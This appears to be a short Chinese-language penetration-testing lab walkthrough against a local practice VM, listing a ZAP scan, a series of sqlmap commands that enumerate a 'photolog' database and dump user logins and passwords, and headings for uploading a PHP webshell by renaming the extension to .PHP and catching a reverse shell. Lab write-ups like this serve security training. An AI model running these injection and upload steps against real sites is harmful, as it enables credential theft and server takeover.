目录
环境配置
kali 192.168.20.128
靶机 192.168.20.131
链接:https://pan.baidu.com/s/1EgN_06ZB1rcKbD8RG6mpag
提取码:6pdq
信息探测
探测敏感信息

尝试弱口令登录

漏洞扫描
web漏洞扫描器owasp-zap

扫描结果

漏洞利用
存在sql注入漏洞
sqlmap -u http://192.168.20.131/cat.php?id=3

获取数据库
sqlmap -u http://192.168.20.131/cat.php?id=3 --dbs

发现数据库名information_schame和photolog
获取数据库下的表名
sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" --tables
发现三个表名,categories,pictures,users
获取字段值
sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" -T "users" --columns

发现id,login,password等字段
获取用户名和密码
sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" -T "users" -C 'login,password' --dump

登录系统

上传shell反弹权限
生成webshell

制作webshell

使用exploit

上传shell.php
.php改为.PHP

打开PHP所在连接

监听反应

shell id
